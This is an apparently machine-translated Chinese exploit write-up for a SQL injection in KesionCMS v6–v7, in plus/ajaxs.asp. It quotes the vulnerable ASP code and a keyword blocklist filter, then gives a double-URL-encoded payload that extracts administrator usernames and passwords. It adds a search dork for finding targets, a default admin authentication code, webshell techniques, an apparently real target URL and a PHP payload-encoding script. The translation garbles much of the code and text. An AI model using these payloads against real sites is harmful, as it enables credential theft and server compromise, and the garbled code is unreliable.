Kesion "0-day" analysis

Affected Versions: kesion v6.0-v7.0 and kesion v7.06 eshop
 
 
 
The reason why I put a quotation mark is that this is not 0 day, because it is only the cause of this vulnerability, it is actually caused by the same function filter. Moreover, this vulnerability has been disclosed. The original vulnerability is a vulnerability in/user/Reg/regajax. asp. This vulnerability is located in the/plus/ajaxs. asp file. The vulnerability works in the same principle, and is caused by the confusion of s function filtering!
 
Check the file code:/plus/ajaxs. asp
 
Dim KS: Set KS = New PublicCls
 
Dim Action
 
Action = KS. S ("Action ")
 
Select Case Action
 
Case "Ctoe" CtoE
 
Case "GetTags" GetTags
 
Case "GetRelativeItem
 
Case "Shop_GetCoupon
 
Case "Shop_ValidateCoupon
 
Case "Shop_BrandOption
 
Case "Shop_CheckProID
 
Case "GetClassOption
 
Case "GetFieldOption
 
Case "SpecialSubList" SpecialSubList
 
Case "GetArea" GetArea
 
Case "GetFunc" GetFunc
 
Case "AddFriend" AddFriend
 
Case "MessageSave
 
Case "CheckMyFriend
 
Case "SendMsg
 
Case "SearchUser
 
Case "CheckLogin
 
Case "relativeDoc
 
Case "getModelType
 
Case "getDocImage" getDocImage
 
Case "checkDocFname
 
Case "addCart" addShoppingCart
 
Case "GetPackagePro" GetPackagePro
 
Case "GetSupplyContact
 
Case "HitsGuangGao
 
Case "GetClubBoardOption
 
Case "getclubboard" GetClubboard
 
Case "getonlinelist
 
End Select
 
..... Snip...
 
'Related Information
 
Sub GetRelativeItem () // vulnerability function starts
 
Dim Key: Key = UnEscape (KS. S ("Key") // The vulnerability location. Only the ks. s function is called and no other filtering is performed.
 
Dim Rtitle: rtitle = lcase (KS. G ("rtitle "))
 
Dim RKey: Rkey = lcase (KS. G ("Rkey "))
 
Dim ChannelID: ChannelID = KS. ChkClng (KS. S ("Channelid "))
 
Dim ID: ID = KS. ChkClng (KS. G ("ID "))
 
Dim Param, RS, SQL, k, SqlStr
 
If Key <> "" Then
 
If (Rtitle = "true" Or RKey = "true") Then
 
If Rtitle = "true" Then
 
Param = Param & "title like '%" & key & "%'" // a search-like injection vulnerability.
 
End if
 
If Rkey = "true" Then
 
If Param = "" Then
 
Param = Param & "keywords like '%' & key &" % '"
 
Else
 
Param = Param & "or keywords like '%' & key &" % '"
 
End If
 
End If
 
Else
 
Param = Param & "keywords like '%' & key &" % '"
 
End If
 
End If
 
 
 
 
 
If Param <> "" Then
 
Param = "where InfoID <>" & id & "and (" & param &")"
 
Else
 
Param = "where InfoID <>" & id
 
End if
 
 
 
If ChannelID <> 0 Then Param = Param & "and ChannelID =" & ChannelID
 
Param = Param & "and verific = 1 ″
 
 
 
SqlStr = "Select top 30 ChannelID, InfoID, Title From KS_ItemInfo" & Param & "order by id desc" // query
 
Set RS = Server. CreateObject ("ADODB. RECORDSET ")
 
RS. Open SqlStr, conn, 1, 1
 
If Not RS. Eof Then
 
SQL = RS. GetRows (-1)
 
End If
 
RS. Close
 
 
Www.2cto.com

Let's take a look at the function at Dim Key: Key = UnEscape (KS. S ("Key"), call the User-Defined Function KS. S for filtering, and then call the UnEscape function for decoding!
Then we can look at the function prototype in/KS_Cls/kesion. commoncls. asp.
 
Function DelSql (Str)
 
Dim SplitSqlStr, SplitSqlArr, I
 
SplitSqlStr = "dbcc | alter | drop | * | and | exec | or | insert | select | delete | update | count | master | truncate | declare | char | mid | chr | set | where | xp_mongoshell"
 
SplitSqlArr = Split (SplitSqlStr, "| ")
 
For I = LBound (SplitSqlArr) To Ubound (SplitSqlArr)
 
If Instr (LCase (Str), SplitSqlArr (I)> 0 Then
 
Die <script> alert ('System warning! \ N \ n1. The data you submit contains the Malicious character "& SplitSqlArr (I) &"; \ n2. Your data has been recorded; \ n3. Your IP Address: "& GetIP &"; \ n4, Operation Date: "& Now &"; \ n Powered By Kesion. com! '); Window. close (); </script>"
 
End if
 
Next
 
DelSql = Str
 
End Function
 
'Get the value of Request. Querystring or Request. Form.
 
Public Function S (Str)
 
S = DelSql (Replace (Request (Str), "'", "),", ") // stop filter, if you use the Unescape () function to filter and generate the final intersection, you can use the unicode encoding method. The characters that are filtered will not appear in the browser. For example, single quotes can be encoded. % 2527, After decoding, it is still "'". In this way, you can bypass filtering by using a second Encoding vulnerability similar to php.
 
 
 
The method to be used successfully depends on
 
Dim KS: Set KS = New PublicCls
 
Dim Action
 
Action = KS. S ("Action ")
 
Select Case Action
 
Case "Ctoe" CtoE
 
Case "GetTags" GetTags
 
Case "GetRelativeItem
 
Call a rule. When the value of the called action is GetRelativeItem, you can call the GetRelativeItem function. In this function, determine whether the key value is null. Therefore, you can add any value after the key, such as conqu3r. Therefore, the structure is very simple, and you just need to inject it directly based on the search method.
 
Convert % ') union select 1, 2, username +' | '+ password from KS_Admin to the following.
 
/Plus/ajaxs. asp? Action = GetRelativeItem & key = conqu3r % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500
 
If it is a version of MSSQL, if you have the corresponding permissions, you can directly use shell through backup.
 
This vulnerability allows you to use CLng type conversion to report the Error Path.
 
Method:
 
/Plus/ajaxs. asp? Action = GetRelativeItem & key = % 25
 
 
 
Google Keyword: intext: Powered By KesionCMS
 
 
 
Default backend:/admin/login. asp default authentication code: 8888
 
 
 
Webshell method in the background:
 
1. Execute the SQL statement and Access to export a Trojan;
 
2. Back up a sentence by inserting a database.
 
 
 
Instance: http://www.allvison.com//plus/ajaxs.asp? Action = GetRelativeItem & key = conqu3r % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500
 
With the conversion code:
 
[Code]
 
<? Php
Error_reporting (E_ERROR );
Set_time_limit (0 );
Print_r ('
========================================================== ==========================================================
Kesioncms command line Conversion Program
------ By conqu3r
========================================================== ==========================================================
');
 
 
 
If ($ argc <2 ){
Print_r ('
========================================================== ==========================================================
Usage: php '. $ argv [0].' "SQL code ";
 
 
 
Example:
Php '. $ argv [0].' "\ '%) union select ...";
========================================================== ==========================================================
');
Die;
}
$ Str = $ argv [1];
For ($ I = 0; $ I <= strlen ($ str); $ I ++ ){
$ Temp. = "% 25". base_convert (ord ($ str [$ I]), 10, 16 );
}
Echo $ temp. "0 ";
?>